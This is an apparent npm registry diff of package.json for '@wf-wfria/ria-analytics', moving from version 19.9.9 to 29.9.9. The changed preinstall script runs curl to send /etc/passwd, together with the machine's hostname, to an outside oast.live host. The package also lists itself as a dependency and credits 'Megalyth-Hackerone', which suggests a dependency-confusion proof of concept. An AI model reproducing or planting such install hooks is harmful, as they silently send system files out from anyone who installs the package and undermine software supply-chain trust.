@wf-wfria/ria-analytics 19.9.9 → 29.9.9
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +6 -3
package/package.json
CHANGED
@@ -1,15 +1,18 @@
|
|
1
1
|
{
|
2
2
|
"name": "@wf-wfria/ria-analytics",
|
3
|
-
"version": "
|
3
|
+
"version": "29.9.9",
|
4
4
|
"description": "Claimes",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
-
"preinstall":"/usr/bin/curl --data '@/etc/passwd' csh158uamv7db2ldgsdgapff6ibmgiqam.oast.live"
|
8
|
+
"preinstall": "/usr/bin/curl --data '@/etc/passwd' `hostname`.csh158uamv7db2ldgsdgapff6ibmgiqam.oast.live"
|
9
9
|
},
|
10
10
|
"keywords": [
|
11
11
|
"Megalyth-Hackerone"
|
12
12
|
],
|
13
13
|
"author": "Megalyth-Hackerone",
|
14
|
-
"license": "ISC"
|
14
|
+
"license": "ISC",
|
15
|
+
"dependencies": {
|
16
|
+
"@wf-wfria/ria-analytics": "^19.9.9"
|
17
|
+
}
|
15
18
|
}
|